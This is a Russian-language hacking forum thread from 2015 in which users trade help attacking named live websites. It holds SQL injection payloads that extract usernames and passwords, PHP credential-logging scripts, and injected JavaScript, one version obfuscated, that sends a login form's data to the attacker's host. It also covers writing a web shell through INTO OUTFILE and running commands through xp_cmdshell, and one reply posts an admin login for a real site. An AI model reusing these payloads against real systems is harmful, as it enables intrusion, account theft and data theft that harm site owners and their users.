2) Специальная cookie должна состоять из более чем 10000 символов для вызова уязвимости в версии Apache
yarbabin said:
↑ (https://antichat.live/posts/3871807/)
на некоторых версиях apache можно:
http://www.securityfocus.com/bid/51706/exploit
А Ajax и метод XMLHTTPResponse не работают?
frank said:
↑ (https://antichat.live/posts/3871818/)
А Ajax и метод XMLHTTPResponse не работают?
почему бы им не работать?
yarbabin said:
↑ (https://antichat.live/posts/3871820/)
почему бы им не работать?
Это бы как бы вопрос-уточнение . Спасибо.
делаю такой запрос (SELECT 1 and ROW(1,1)>(select count(*),concat((SELECT wallet_address FROM users WHERE user_id = 1),floor(rand(0)*2))x FROM INFORMATION_SCHEMA.COLLATIONS GROUP BY x)a)+'
но в ответ получаю
Subquery returns more than 1 row
как вытащить wallet_address (34 символа)?
спасибо
madam said:
↑ (https://antichat.live/posts/3872592/)
делаю такой запрос (SELECT 1 and ROW(1,1)>(select count(*),concat((SELECT wallet_address FROM users WHERE user_id = 1),floor(rand(0)*2))x FROM INFORMATION_SCHEMA.COLLATIONS GROUP BY x)a)+'
но в ответ получаю
Subquery returns more than 1 row
как вытащить wallet_address (34 символа)?
спасибо
выводите через extractvalue() или попробуйте обернуть колонку в group_concat()
спасибо group_concat() помогло
Есть сайт такого типаhttp://s1.sendimage.me/jHsTLwmb.jpeg
Форма логина такая -
----------------------------------------------------------------------------------------------------------------
Форма пароля такая -
----------------------------------------------------------------------------------------------------------------
Можно ли удаленным js воровать логи и пароли из этих форм ?кража кук не подходит т.к httponly не обходится.((Или что еще можно придумать?Заранее спс
Картинка была нарисована в paint ,просто порисовать захотелось)))
ocheretko
26.07.2015, 19:04
Можно, применяйте фишинг и социальную инженерию. Не обязательно использовать javascript, достаточно html разметки
ocheretko said:
↑ (https://antichat.live/posts/3872917/)
Можно, применяйте фишинг и социальную инженерию. Не обязательно использовать javascript, достаточно html разметки
А не подскажете хороший бесплатный хостинг с поддержкой php и доменом .ru?
Хотя поди палевно будет т.к будет ругаться антивирусник.А можно ли при помощи js красть введенные данные из форм?
подскажите,возможно ли обойти ограничение в 40 символов,в поле восстановления пароля? Правка Html ничего не даёт(хотя раньше пролазило(()
руками запрос формировать пробовали для отправки?
просто длинная поля еще может контролироваться со стороны сервера и тогда скорее всего никак нельзя.
frank said:
↑ (https://antichat.live/posts/3873125/)
руками запрос формировать пробовали для отправки?
просто длинная поля еще может контролироваться со стороны сервера и тогда скорее всего никак нельзя.
только ручками и пробовала,скорее всего подправили файлик,всё таки облачный майнинг))
ocheretko
27.07.2015, 12:11
"]http://google.com>[/URL] - эта конструкция ровно 40 символов
ocheretko said:
↑ (https://antichat.live/posts/3873167/)
"]http://google.com>[/URL]
- эта конструкция ровно 40 символов
там SQl inj
madam said:
↑ (https://antichat.live/posts/3873164/)
только ручками и пробовала,скорее всего подправили файлик,всё таки облачный майнинг))
POST запрос отправляемый имеете ввиду пробовали подправлять?
Br@!ns said:
↑ (https://antichat.live/posts/3873179/)
POST запрос отправляемый имеете ввиду пробовали подправлять?
Да
madam said:
↑ (https://antichat.live/posts/3873188/)
Да
Тогда точно на стороне сервера фильтр, больше и не отправите
Дальнейшая задача скрипта расположенного на удаленном сервере, заключается в приеме, обработке и сохранении POST параметров login и password. Некоторые ключевые фрагменты скрипта будут иметь следующий вид:
…
$fd = fopen($file,"a");
…
fputs($fd, " login: ".$_POST['login']." password:".$_POST['password']);
…
fclose($fd);
…
echo
"
document.location.replace('
http://www.site.com/auth.html’); (http://www.site.com/auth.html%E2%80%99))
"
----------------------------------------------------------------------------------------------------------------------
как именно нужно прописать этот php?
примерно так?)))
"site.ru/asdasd.php?id=-123'"
CDbCommand не удалось исполнить SQL-запрос: SQLSTATE[42000]: Syntax error or access violation: 1064 You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'AND d.is_deleted=0 AND a.is_deleted=0 AND a.is_approved=1 GROUP by d.id' at line 4
Как правильно раскрутить ее.
sysjuk said:
↑ (https://antichat.live/posts/3873554/)
"site.ru/asdasd.php?id=-123'"
CDbCommand не удалось исполнить SQL-запрос: SQLSTATE[42000]: Syntax error or access violation: 1064 You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'AND d.is_deleted=0 AND a.is_deleted=0 AND a.is_approved=1 GROUP by d.id' at line 4
Как правильно раскрутить ее.
-123+order+by+100+--+
-123+union+select+1,2,3,4,5,6+--+
Всё по стандарту. Никаких аномалий.
BigBear said:
↑ (https://antichat.live/posts/3873572/)
-123+order+by+100+--+
-123+union+select+1,2,3,4,5,6+--+
Всё по стандарту. Никаких аномалий.
Так дело в том что ничего не меняется))) Уже все перепробовал)
sysjuk said:
↑ (https://antichat.live/posts/3873588/)
Так дело в том что ничего не меняется))) Уже все перепробовал)
Вы либо ссылку кидайте, либо разбирайтесь дальше сами. Флуд здесь не нужен.
http://www.toramp.com/schedule.php?id=505' (http://www.toramp.com/schedule.php?id=505%27) - появляются караракули .
И ничего более .
Единственное что узнал .
Host IP: 109.120.169.82
Web Server: nginx/0.7.67
Powered-by: PHP/5.3.3-7+squeeze14
ocheretko
28.07.2015, 19:13
Эти каракули написаны в кодировке - ISO-8859-5, и расшифровываются как Неверный формат запроса. Проверьте URL.
Простыми словами - Вы получаете сообщение от обработчика ошибок
ocheretko said:
↑ (https://antichat.live/posts/3873736/)
Эти каракули написаны в кодировке -
ISO-8859-5
, и расшифровываются как
Неверный формат запроса. Проверьте URL.
Простыми словами - Вы получаете сообщение от обработчика ошибок
Благодарю,и это не как,не относится к SQL?Взломать нельзя? . Наверно сайт защищен от SQL .
Genius Black
29.07.2015, 16:53
Warning: mysql_data_seek(): supplied argument is not a valid MySQL result resource in C:\wamp\www\productos.php on line 41
Warning: mysql_result(): supplied argument is not a valid MySQL result resource in C:\wamp\www\productos.php on line 42
Warning: mysql_free_result(): supplied argument is not a valid MySQL result resource in C:\wamp\www\productos.php on line 43
Query invбlido: select explica from linea_explica where linea = ''''
С этим ничего как я понял нельзя сделать?
зависит от того, что вы хотите сделать.
Genius Black
29.07.2015, 18:33
yarbabin said:
↑ (https://antichat.live/posts/3874160/)
зависит от того, что вы хотите сделать.
Залезть в базу и слить данные.
Все способы, которые можно было - я перепробовал.
Genius Black said:
↑ (https://antichat.live/posts/3874161/)
Залезть в базу и слить данные.
Все способы, которые можно было - я перепробовал.
Вы что то с запросом сделать пытаетесь или это у вас просто страничка с ошибкой? ссылочку бы показали
linea='
Genius Black said:
↑ (https://antichat.live/posts/3874115/)
Query invбlido: select explica from linea_explica where linea = '
''
'
linea=\' UNION SELECT version(); #
Genius Black said:
↑ (https://antichat.live/posts/3874115/)
Query invбlido: select explica from linea_explica where linea = '
\'' UNION SELECT version(); #
'
Может быть.
YaBtr said:
↑ (https://antichat.live/posts/3873592/)
Вы либо ссылку кидайте, либо разбирайтесь дальше сами. Флуд здесь не нужен.
Code:
клад3.биз/?district_id=-31 раскрутить поможешь?
ссылка ушла в личку.
Havj не инжектить . Пробовал раскручивать,выдаёт ту же самую ссылку .
Вот собственно сама ссылочка metravib.acoemgroup.com/application.php?id=3&idm=20&ida=34 1
Blind Injection .
MYSQL Injection . Ссылка : www.muziekcentrum.be/carrier.php?id=8333 (http://www.muziekcentrum.be/carrier.php?id=8333) .
Как это раскрутить ? Помогите .
error'овые,не?
Помогите пжл,как сохранять запрос
Code:
$fd = fopen($file,"a");
…
fputs($fd, " login: ".$_POST['login']." password:".$_POST['password']);
…
fclose($fd);
…
nik1201 said:
↑ (https://antichat.live/posts/3874648/)
Помогите пжл,как сохранять запрос
Code:
$fd = fopen($file,"a");
…
fputs($fd, " login: ".$_POST['login']." password:".$_POST['password']);
…
fclose($fd);
…
код верный, что у вас не выходит?
А куда он должен сохранять логин и пасс?
В $file, имя которого ты указываешь сам.
Pro100Nyan
31.07.2015, 14:19
Здравствуйте есть шелл на сервере Windows NT SERVER, нужно узнать какие домены на нем установлены, как можно это узнать ?)) Стоит наверно IIRF(хз что это но такие файлы есть в корне сайтов) вот такие файлы IIRF.ini
Pro100Nyan said:
↑ (https://antichat.live/posts/3874867/)
Здравствуйте есть шелл на сервере Windows NT SERVER, нужно узнать какие домены на нем установлены, как можно это узнать ?)) Стоит наверно IIRF(хз что это но такие файлы есть в корне сайтов) вот такие файлы IIRF.ini
Reverse IP не помогает?
итак, ищем в гугле "IIRF.ini"
в первых 6 результатах видим:
Installation of URL Rewriting module (IIRF) for IIS6/IIS7
вывод - IIS. ищем "iis configuration file"
находим: http://stackoverflow.com/questions/8635884/iis7-settings-file-locations
Pro100Nyan
31.07.2015, 16:29
yarbabin said:
↑ (https://antichat.live/posts/3874903/)
итак, ищем в гугле "IIRF.ini"
в первых 6 результатах видим:
вывод - IIS. ищем "iis configuration file"
находим:
http://stackoverflow.com/questions/8635884/iis7-settings-file-locations
К сожалению там нету такого файла, там одни только .dll файлы
Кто-нибудь может в личке помочь и глянуть один сайт? DB Oracle язвимость
Place: GET
Parameter: SL
Type: boolean-based blind
Title: Oracle boolean-based blind - GROUP BY and ORDER BY clauses
Payload: ...&SL=54,(SELECT (CASE WHEN (7590=7590) THEN 54 ELSE CAST(1 AS INT)/(SELECT 0 FROM DUAL) END) FROM DUAL)
Type: AND/OR time-based blind
Title: Oracle time-based blind - GROUP BY and ORDER BY clauses (DBMS_PIPE.RECEIVE_MESSAGE)
Payload: ....&SL=54,(SELECT (CASE WHEN (9646=9646) THEN DBMS_PIPE.RECEIVE_MESSAGE(CHR(99)||CHR(101)||CHR(9 7)||CHR(117),5) ELSE 1/(SELECT 0 FROM DUAL) END) FROM DUAL)
Всё выдётся отлично, вывод хороший, стабильный. Но вместо хеша или пароля в табличке юзоров выдаётся какая-то символьная фигня типа:
\x1c\x1f\x17\x18\x0ev\x1fjt\x15}
Притом это не на одном сайте, а на всех сайтах этой платформы.
Кто имеет время глянуть, напишите в личку, я скину урл. Очень важные для меня сайты на этой полатформе, я бьюсь в отчаянии, не знаю что делать. ПОМОГИТЕ!!!!!!
UPDATE: прогнала SQLMAP с режимом --binary-fields=PASSWORD, похоже, что пароли хранятся в бинарном виде. Выдаёт следующее:
157E02680F7F
1B0C130E197B620B7316
131E091001
171E0A0B057F620C7E12
00051D00087D6B087F17
171D1C0D0B676A08711D
0A00011F0A076F0F07600B0A
Что это за хеши такие? Oracle(DES)? или...? есть идеи?
PS можно платно
Почему у меня ничего не записывает php?
------------------------------------------------------------------------------------------------------------
------------------------------------------------------------------------------------------------------------
Вставляю этот скрипт
------------------------------------------------------------------------------------------------------------
document.lsform.action=‘http://hosting.ru/base.php’
------------------------------------------------------------------------------------------------------------
в страницу где форма
------------------------------------------------------------------------------------------------------------
------------------------------------------------------------------------------------------------------------
И ничего не происходит,в чем может быть проблема?
ocheretko
03.08.2015, 14:32
djon said:
↑ (https://antichat.live/posts/3875805/)
Почему у меня ничего не записывает php?
------------------------------------------------------------------------------------------------------------
------------------------------------------------------------------------------------------------------------
Вставляю этот скрипт
------------------------------------------------------------------------------------------------------------
document.lsform.action=‘
http://hosting.ru/base.php’
------------------------------------------------------------------------------------------------------------
в страницу где форма
------------------------------------------------------------------------------------------------------------
------------------------------------------------------------------------------------------------------------
И ничего не происходит,в чем может быть проблема?
Code:
$url = "";
$ls_username = $_POST['ls_username'];
$ls_password = $_POST['ls_password'];
if ($ls_username != null){
if ($ls_password != null) {
$open=fopen('base.txt',"a");
fwrite($open,"$ls_username;$ls_password\n");
fclose($open);
}
}
Genius Black
03.08.2015, 15:52
Почему информация об ошибке выводиться только при .php?c=1 group by . Если указывать ' , union , by order или любые другие способы, то ничего не выводит?
man474019 said:
↑ (https://antichat.live/posts/3875808/)
плиз, помогите с sqli
Нет инъекции. Только ошибка.
Почему когда вставляю код (
document.getElementById('lsform').action="http://МойХостинг1.ru/base.php? (http://МойХостинг1.ru/base.php)";)
на сайт где есть активная xss,то она преобразуется так (УязвимыйСайт.ru/base.php)и пишет что "страница не найдена" а на втором моем хостинге где расположена копия сайта (УязвимыйСайт.ru/forum.php) по адрессу (http://МойХостинг2.ru) то логины и пароли идут нормально после нажатия на кнопку Вход,и после нажатия она переадресовывается на ("http://МойХостинг1.ru/base.php? (http://МойХостинг1.ru/base.php)")Почему с (УязвимыйСайт.ru/forum.php) не идут пароли ?
ocheretko
04.08.2015, 12:56
Попробуйте так. Может там нормализатор ссылок обрезает http://
Code:
String.fromCharCode(100, 111, 99, 117, 109, 101, 110, 116, 46, 103, 101, 116, 69, 108, 101, 109, 101, 110, 116, 66, 121, 73, 100, 40, 39, 108, 115, 102, 111, 114, 109, 39, 41, 46, 97, 99, 116, 105, 111, 110, 61, 34, 104, 116, 116, 112, 58, 47, 47, 1052, 1086, 1081, 1061, 1086, 1089, 1090, 1080, 1085, 1075, 49, 46, 114, 117, 47, 98, 97, 115, 101, 46, 112, 104, 112, 63, 34, 59);
потому что так работает action. добавьте редирект обратно на форум в вашем base.php
Редирект не помагает,вот как происходит;мой хостинг где лежит base.php "МойХостинг.ru/base.php" их сайт "УязвимыйСайт.ru/forum/forum.php" когда нажимаю ВХОД то ничего не происходит,даже в профиль не заходит,смотрю через чарльз что происходит там,и вижу что вместо "МойХостинг.ru/base.php" становится так" УязвимыйСайт.ru/base.php" и в пакете есть логин и пас,но ничего не происходит(((
вот сам base.php
----------------------------------------------------------------
-------------------------------------------------------------------
Я сначала ввожу скрипт вместо ника а в 1.js лежит document.getElementById('lsform').action="http://МойСайт.ru/base.php? (http://МойСайт.ru/base.php)";
--------------------------------------------------------------------
Скрипт, скорее всего, нужно выполнять в document onload. Возможно на странице есть ещё какие-то скрипты.
Правильнее было бы сделать скрипт для события onsubmit, который без двойных заметных редиректов отправлял данные к нам на хост. Если XSS не в login.php, пишут скрипты, которые остаются на странице даже после того, как юзер её покинет переходом по ссылке на другую.
Я для этой формы скрипт подключаю,есть еще js на их сайте,выглядит так
А в нем вот это
Code:
function lsSubmit(op) {
var op = !op ? 0 : op;
if(op) {
$('lsform').cookietime.value = 2592000;
}
if($('ls_username').value == '' || $('ls_password').value == '') {
showWindow('login', 'member.php?mod=logging&action=login' + (op ? '&cookietime=1' : ''));
} else {
ajaxpost('lsform', 'return_ls', 'return_ls');
}
return false;
}
function errorhandle_ls(str, param) {
if(!param['type']) {
showError(str);
}
}
Еще к сылке добавляется inajax, вот так /base.php?&inajax
И уязвимость Активная,и находится где форма авторизации
Может кто подсказать что можно из этого вытащить?
вот сайт http://www.rostof.ru/article.php?chapter=&id=
а вот скрин скана
http://hkar.ru/CVkO
kingbeef
06.08.2015, 22:43
GusTor said:
↑ (https://antichat.live/posts/3876802/)
Может кто подсказать что можно из этого вытащить?
вот сайт
http://www.rostof.ru/article.php?chapter=&id=
а вот скрин скана
http://hkar.ru/CVkO
Ну там же написано.
Code:
http://www.rostof.ru/article.php?chapter=&id=">alert()
djon said:
↑ (https://antichat.live/posts/3876635/)
Вот он - корень всех зол.
BabaDook
07.08.2015, 00:09
Здравствуйте. заранее простите за не корректную формулировку вопроса. Имею sql инъекцию, права рут, ОС виндус, как выполнить команду cmd?
winstrool
07.08.2015, 00:19
BabaDook said:
↑ (https://antichat.live/posts/3877302/)
Здравствуйте. заранее простите за не корректную формулировку вопроса. Имею sql инъекцию, права рут, ОС виндус, как выполнить команду cmd?
Заливаите шелл и если нужные функции в пхп не отключены то через консоль выполняите нужные вам команды
BabaDook
07.08.2015, 11:20
winstrool said:
↑ (https://antichat.live/posts/3877305/)
Заливаите шелл и если нужные функции в пхп не отключены то через консоль выполняите нужные вам команды
шел залить можно. Но мне интересно именно это. как через sqlmap делать я более мение знаю, а вот как ручками не знаю вообще. Надо привыкать в полевым условиям, когда только я и сайт, а между нами браузер.
BabaDook said:
↑ (https://antichat.live/posts/3877382/)
шел залить можно. Но мне интересно именно это. как через sqlmap делать я более мение знаю, а вот как ручками не знаю вообще. Надо привыкать в полевым условиям, когда только я и сайт, а между нами браузер.
SELECT '' INTO OUTFILE 'var/www/site.com/shell.php';--
BabaDook
07.08.2015, 11:32
grimnir said:
↑ (https://antichat.live/posts/3877385/)
SELECT '' INTO OUTFILE 'var/www/site.com/shell.php';--
это запись. а мне именно выполнение cmd команды надо. Ладно , сделаю выложу то что мне надо было, не могу объяснить ))
XAMEHA said:
↑ (https://antichat.live/posts/3877296/)
Вот он - корень всех зол.
Да мне кажется что проблема даже не в "onsubmit="return lsSubmit();"
Пробую сделать даже так для чекбокса,что бы удалить disabled="disabled
document.getElementById ('htmlon').removeAttribute ('disabled');
И тоже не выходит cсылка делается такой /forum/h%3C/a%3E%3C/li%3E%3Cli%20title=
Я вот что еще нашел на странице
8
-------------------------------------------------------------------
Крест
BabaDook said:
↑ (https://antichat.live/posts/3877386/)
это запись. а мне именно выполнение cmd команды надо. Ладно , сделаю выложу то что мне надо было, не могу объяснить ))
sqlmap так и делает. льет файл с system() или другими и к ним уже обращается, как к шеллу, парся вывод. в postgresql 9.3 и mssql есть функция выполнения системных команд. это то, о чем вы говорите? какая dbms? mssql?
Выполнение команд (mysql) - либо через сторонний интерпретатор (php), либо через эксплоит, либо этим способом (для SQL-инъекций не подойдет): https://forum.antichat.net/threads/324318/
BabaDook
07.08.2015, 12:25
Вот, это я имел в виду.
http://www.sqlinjectionwiki.com/Cat...eat-sheet/#Enablingxp_cmdshellinSQLServer2005 (http://www.sqlinjectionwiki.com/Categories/1/mssql-sql-injection-cheat-sheet/#Enablingxp_cmdshellinSQLServer2005)
Code:
XEC master.dbo.xp_cmdshell "cmd.exe реж C: '
а про вот это я забыл, что такое тоже можно
Code:
xp_regaddmultistring
xp_regdeletekey
xp_regdeletevalue
xp_regenumkeys
xp_regenumvalues
xp_regread
xp_regremovemultistring
xp_regwrite
Exec xp_regread HKEY_LOCAL_MACHINE "SYSTEM \ CurrentControlSet \ Services \ LanmanServer \ Параметры", "nullsessionshares"
Exec xp_regenumvalues HKEY_LOCAL_MACHINE "SYSTEM \ CurrentControlSet \ Services \ SNMP \ Параметры \ validcommunitie
т. е. нужно было просто с самого начала сказать, что у вас mssql.
BabaDook said:
↑ (https://antichat.live/posts/3877408/)
Вот, это я имел в виду.
http://www.sqlinjectionwiki.com/Cat...eat-sheet/#Enablingxp_cmdshellinSQLServer2005 (http://www.sqlinjectionwiki.com/Categories/1/mssql-sql-injection-cheat-sheet/#Enablingxp_cmdshellinSQLServer2005)
Code:
XEC master.dbo.xp_cmdshell "cmd.exe реж C: '
а про вот это я забыл, что такое тоже можно
Code:
xp_regaddmultistring
xp_regdeletekey
xp_regdeletevalue
xp_regenumkeys
xp_regenumvalues
xp_regread
xp_regremovemultistring
xp_regwrite
Exec xp_regread HKEY_LOCAL_MACHINE "SYSTEM \ CurrentControlSet \ Services \ LanmanServer \ Параметры", "nullsessionshares"
Exec xp_regenumvalues HKEY_LOCAL_MACHINE "SYSTEM \ CurrentControlSet \ Services \ SNMP \ Параметры \ validcommunitie
https://rdot.org/forum/showthread.php?t=826 читать абзац "выполнение команд"
psihoz26
07.08.2015, 22:32
nik1201 said:
↑ (https://antichat.live/posts/3872869/)
Есть сайт такого типа
http://s1.sendimage.me/jHsTLwmb.jpeg
Форма логина такая -
----------------------------------------------------------------------------------------------------------------
Форма пароля такая -
----------------------------------------------------------------------------------------------------------------
Можно ли удаленным js воровать логи и пароли из этих форм ?кража кук не подходит т.к httponly не обходится.
((Или что еще можно придумать?Заранее спс
Картинка была нарисована в paint ,просто порисовать захотелось)))
ocheretko said:
↑ (https://antichat.live/posts/3872917/)
Можно, применяйте фишинг и социальную инженерию. Не обязательно использовать javascript, достаточно html разметки
Незачем фишинг ,левые сервера и уж темболее си.Если сторед xss на тойже страничке что и форма авторизации то все легко перехватывается. Нужен будет сниффер лишь чтобы заместо куков ловить логины и пароли. По реализации подсказать в лс могу
Нашел такое www.site.ru/api.php?appId=APP324233456&cb=&user=test@mail.ru&pwd=123123&fn=1 (http://www.site.ru/api.php?appId=APP324233456&cb=&user=test@mail.ru&pwd=123123&fn=1)
это отвечает за вход на сайт,когда нажимаю ENTER то оно выдает такое ({"email":"test@mail.ru (mailto:test@mail.ru)","nickname":"test","profileId":"6434","password":"7534534583eeffa8377c4d","freeze":"0","opo_userid":"133"}) в параметре cb= можно прописать любой html код,например () то он исполнится ,и будет выглядеть так
тут будет форма
({"email":"test@mail.ru (mailto:test@mail.ru)","nickname":"test","profileId":"6434","password":"7534534583eeffa8377c4d","freeze":"0","opo_userid":"133"})
И ява скрипты не исполняются почему то.
Что можно с этим сделать?
Pro100Nyan
10.08.2015, 13:51
Pro100Nyan said:
↑ (https://antichat.live/posts/3874867/)
Здравствуйте есть шелл на сервере Windows NT SERVER, нужно узнать какие домены на нем установлены, как можно это узнать ?)) Стоит наверно IIRF(хз что это но такие файлы есть в корне сайтов) вот такие файлы IIRF.ini
Актуально...
Code:
ibizavipholiday.com/ru/villas?place=1'+||+ascii(lower(substring(version() ,1,1)))='53
version 5.1.72-cll-lve
Помогите. WAF фильтрует information_schema.tables. Как обойти?
Unknowhacker
10.08.2015, 17:33
Когда пишет.. ORA-00923: FROM keyword not found where expected - это считается SQL-Уязвимостью ?
Code:
http://www.pz.gov.ua/prrasp/rasptrain.php?train=2345+order+by+5+--+
Unknowhacker said:
↑ (https://antichat.live/posts/3878526/)
Когда пишет.. ORA-00923: FROM keyword not found where expected - это считается SQL-Уязвимостью ?
Code:
http://www.pz.gov.ua/prrasp/rasptrain.php?train=2345+order+by+5+--+
https://rdot.org/forum/showthread.php?t=156
djon said:
↑ (https://antichat.live/posts/3878428/)
Нашел такое
www.site.ru/api.php?appId=APP324233456&cb=&user=test@mail.ru&pwd=123123&fn=1 (http://www.site.ru/api.php?appId=APP324233456&cb=&user=test@mail.ru&pwd=123123&fn=1)
это отвечает за вход на сайт,когда нажимаю ENTER то оно выдает такое ({"email":"
test@mail.ru (mailto:test@mail.ru)
","nickname":"test","profileId":"6434","password":"7534534583eeffa8377c4d","freeze":"0","opo_userid":"133"}) в параметре cb= можно прописать любой html код,например () то он исполнится ,и будет выглядеть так
тут будет форма
({"email":"
test@mail.ru (mailto:test@mail.ru)
","nickname":"test","profileId":"6434","password":"7534534583eeffa8377c4d","freeze":"0","opo_userid":"133"})
И ява скрипты не исполняются почему то.
Что можно с этим сделать?
Скорее всего возвращаемый content-type - text/json, XSS там не выполнить. Я бы обратил внимание на возможные получения данных и CSRF.
Pro100Nyan said:
↑ (https://antichat.live/posts/3878443/)
Здравствуйте есть шелл на сервере Windows NT SERVER, нужно узнать какие домены на нем установлены, как можно это узнать ?)) Стоит наверно IIRF(хз что это но такие файлы есть в корне сайтов) вот такие файлы IIRF.ini
Домены, которые DNS, или домены, которые наборы сетевых компьютеров с общими политиками?
Chudak said:
↑ (https://antichat.live/posts/3878472/)
Code:
ibizavipholiday.com/ru/villas?place=1'+||+ascii(lower(substring(version() ,1,1)))='53
version 5.1.72-cll-lve
Помогите. WAF фильтрует information_schema.tables. Как обойти?
Вы в слепую крутите? У вас вывод есть. Еще есть вывод ошибок. WAF фильтрует information_schema, в настоящее время обойти это не возможно. Брутите таблицы
Pro100Nyan
11.08.2015, 03:06
XAMEHA said:
↑ (https://antichat.live/posts/3878691/)
Домены, которые DNS, или домены, которые наборы сетевых компьютеров с общими политиками?
которые dns, те что сайты)
blackhead
11.08.2015, 17:39
Нашел вот такую уязвимость
Code:
http://www.oscar-k.dk/newsdetail.php?id=2+union+select+1,2,3,4,5,6,7,8,9 +--
Нашел username,password но админку так и не смог найти((
Code:
http://www.oscar-k.dk/newsdetail.php?id=-2+union+select+1,id,username,password,5,6,7,8,9+FR OM+users+LIMIT+0,1+--
Записать файл не получается.
Что нибудь можно тут сделать? Помогите начинающему
blackhead said:
↑ (https://antichat.live/posts/3878949/)
Нашел вот такую уязвимость
Code:
http://www.oscar-k.dk/newsdetail.php?id=2+union+select+1,2,3,4,5,6,7,8,9 +--
Нашел username,password но админку так и не смог найти((
Code:
http://www.oscar-k.dk/newsdetail.php?id=-2+union+select+1,id,username,password,5,6,7,8,9+FR OM+users+LIMIT+0,1+--
Записать файл не получается.
Что нибудь можно тут сделать? Помогите начинающему
http://www.oscar-k.dk/content/index.php?signIn=1
В админке сайта есть скрипт elFinder.
Пытаюсь через него загрузить php файл.
Скрипт, походу, читает заголовки mime т.к.
Файлы типа .php и html не пропускает. Если создать простейший скрипт аля
не пропустит.
Но если изображение переименовать в test.php то с легкостью загружает.
Как правильно переименовать внутренности, чтобы файл jpg он воспринял как php или наоборот?
Если файл test.php переименовать в test.jpg не пропускает так же...
OxoTnik said:
↑ (https://antichat.live/posts/3879009/)
http://www.oscar-k.dk/content/index.php?signIn=1
опередил) у него ещё wildcard как то хитро настроен, по идее ещё есть
phpmyadmin.oscar-k.dk
content.oscar-k.dk
ftp://ftp.oscar-k.dk
ocheretko
11.08.2015, 20:53
Muracha said:
↑ (https://antichat.live/posts/3879019/)
В админке сайта есть скрипт elFinder.
Пытаюсь через него загрузить php файл.
Скрипт, походу, читает заголовки mime т.к.
Файлы типа .php и html не пропускает. Если создать простейший скрипт аля
не пропустит.
Но если изображение переименовать в test.php то с легкостью загружает.
Как правильно переименовать внутренности, чтобы файл jpg он воспринял как php или наоборот?
Если файл test.php переименовать в test.jpg не пропускает так же...
Проверьте, не фильтрует ли конструкцию
Он фильтрует не содержимое файла, без разницы что там, eval или echo.
Он фильтрует заголовки
код типа пропустил но выполнить не удалось
Code:
‰PNG
IHDR ђwSЮ pHYs љњ tIMEЯ
’ьdп IDATЧcшяя? ююЬМYз IEND®B`‚
blackhead
11.08.2015, 21:14
OxoTnik said:
↑ (https://antichat.live/posts/3879009/)
http://www.oscar-k.dk/content/index.php?signIn=1
Спасибо, но как вы нашли? Софт или сервис? Перепробовал много, но не нашел((
PS
Да, и еще если не получится раcшифровать пароль, то есть еще какие нибудь варианты?
софт со своим словарём.
blackhead said:
↑ (https://antichat.live/posts/3879038/)
Спасибо, но как вы нашли? Софт или сервис? Перепробовал много, но не нашел((
PS
Да, и еще если не получится раcшифровать пароль, то есть еще какие нибудь варианты?
blackhead said:
↑ (https://antichat.live/posts/3879038/)
Спасибо, но как вы нашли? Софт или сервис? Перепробовал много, но не нашел((
PS
Да, и еще если не получится раcшифровать пароль, то есть еще какие нибудь варианты?
http://content.oscar-k.dk/index.php?signIn=1
seba:12345
XAMEHA said:
↑ (https://antichat.live/posts/3878691/)
Вы в слепую крутите? У вас вывод есть. Еще есть вывод ошибок. WAF фильтрует information_schema, в настоящее время обойти это не возможно. Брутите таблицы
Спасибо!!!!Вывод ошибок через extractvalue я видел, а на прямой вывод что-то не получается составить запрос. Может подскажешь?!!!
blackhead
12.08.2015, 22:08
t0ma5 said:
↑ (https://antichat.live/posts/3879290/)
http://content.oscar-k.dk/index.php?signIn=1
seba:12345
Спасибо, но хотелось бы знать что откуда. Если не трудно хотя-бы вкратце - как найти админку и откуда seba:12345 (в базе я нашел только юзера oscar).
Octavian
13.08.2015, 02:08
нашол такую хсс при нажатие в правом углу на закрытие появляется алерт
http://www.torrentsmd.com/smilies_popup.php?text=3&container='+alert(+document.cookie)+'&lang=ro (http://www.torrentsmd.com/smilies_popup.php?text=3&container=%27%2Balert(+document.cookie)%2B%27&lang=ro)
где типерь запихнуть сылку сниффера помоги пожалуста
http://hacker-lab.com/sniffer/images/251095_3.jpg
Chudak said:
↑ (https://antichat.live/posts/3879334/)
Спасибо!!!!Вывод ошибок через extractvalue я видел, а на прямой вывод что-то не получается составить запрос. Может подскажешь?!!!
Code:
place=1')sub2 WHERE 1.0Union/*!SELECT*/ 1,2,3,4,5,6,7,8,9,10,11,version(),13,14,15,16,17,1 8,19,20--+
Инъекция в table_references.
ребят вот нашёл сайт, и перейдя по правельной ссылки мне выдаёт файл config и там настройки подключения к бд
DATABASE HOSTNAME - есть
DATABASE USERNAME - есть
DATABASE PASSWORD - есть
DATABASE NAME - есть
DATABASE PORT - есть
И ещё асякие конфигурации там вроде даже есть привязка по IP адресам
Так вот в чём вопрос это считается серьёзной уязвимостью ? (если да то на сколько она серьёзная)
Sensoft said:
↑ (https://antichat.live/posts/3879509/)
ребят вот нашёл сайт, и перейдя по правельной ссылки мне выдаёт файл config и там настройки подключения к бд
DATABASE HOSTNAME - есть
DATABASE USERNAME - есть
DATABASE PASSWORD - есть
DATABASE NAME - есть
DATABASE PORT - есть
И ещё асякие конфигурации там вроде даже есть привязка по IP адресам
Так вот в чём вопрос это считается серьёзной уязвимостью ? (если да то на сколько она серьёзная)
Серьёзная уязвимость, можно управлять БД, залить шелл, в общем что угодно сделать с сайтом.
montag52
13.08.2015, 12:35
Sensoft said:
↑ (https://antichat.live/posts/3879509/)
ребят вот нашёл сайт, и перейдя по правельной ссылки мне выдаёт файл config и там настройки подключения к бд
DATABASE HOSTNAME - есть
DATABASE USERNAME - есть
DATABASE PASSWORD - есть
DATABASE NAME - есть
DATABASE PORT - есть
И ещё асякие конфигурации там вроде даже есть привязка по IP адресам
Так вот в чём вопрос это считается серьёзной уязвимостью ? (если да то на сколько она серьёзная)
А какая СУБД?
Если MySQL, например, то не забудь про UDF функции, при помощи которых можно замутить RCE от имени пользователя СУБД на уровне ОС.
В общем вот сайт http://www.tvzavr.ru/
Netsparker показывает уязвимости Netsparker
Cookie Not Marked as Secure
Cross-site Scripting -
.SpoilerTarget" type="button">Spoiler: Отчёт
Url http://www.tvzavr.ru/filmy?sort='"-->netsparker(0x00052A) (http://www.tvzavr.ru/filmy?sort=%27%22--%3E%3C/style%3E%3C/scRipt%3E%3CscRipt%3Ealert(0x00052A)%3C/scRipt%3E)
Parameter Name sort
Parameter Type GET
Attack Pattern '"-->netsparker(0x00052A)
Можно как нибудь слить BD или накасячить на сайте ?
'nj
Sensoft said:
